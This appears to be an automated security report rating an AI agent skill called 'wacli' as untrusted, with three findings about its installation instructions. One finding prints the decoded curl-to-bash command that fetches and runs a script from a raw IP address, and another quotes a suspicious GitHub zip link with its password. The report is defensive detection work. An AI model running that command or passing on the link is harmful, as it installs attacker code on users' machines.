Trust Assessment
wacli received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Malicious Remote Code Execution via Base64-encoded `curl | bash`, Suspicious `OpenClawProvider` Download from Untrusted GitHub Repository.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/wacli-evv/SKILL.md:10 | |
| CRITICAL | Malicious Remote Code Execution via Base64-encoded `curl | bash` The skill's installation instructions for MacOS include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from a suspicious IP address (`91.92.242.30`) directly into the shell. This constitutes a severe remote code execution (RCE) vulnerability, allowing an attacker to run any code on the user's system without explicit consent or review. This is a direct and immediate threat. Immediately remove the malicious `curl | bash` command. Provide legitimate and secure installation instructions for `OpenClawProvider` from a trusted, verified source, or remove the dependency if it's not essential or cannot be sourced securely. Users should be warned against executing such commands. | LLM | SKILL.md:12 | |
| HIGH | Suspicious `OpenClawProvider` Download from Untrusted GitHub Repository The skill instructs users to download `OpenClawProvider` from `https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`. This repository (`syazema/OpenClawProvider`) appears to be a fork or copy of a legitimate project but is hosted under a suspicious, single-repository user account. Downloading and executing an arbitrary executable from an untrusted source, especially with a provided password (`openclaw`) for extraction, poses a significant supply chain risk and could lead to malware execution or system compromise. This is indicative of a typosquatting or malicious package distribution attempt. Replace the download link with an official, verified source for `OpenClawProvider` or remove the dependency if a trusted source cannot be identified. Advise users against downloading and executing software from unverified GitHub accounts or untrusted URLs. | LLM | SKILL.md:9 |
Scan History
Embed Code
[](https://skillshield.io/report/8a876c3efb4e3f80)
Powered by SkillShield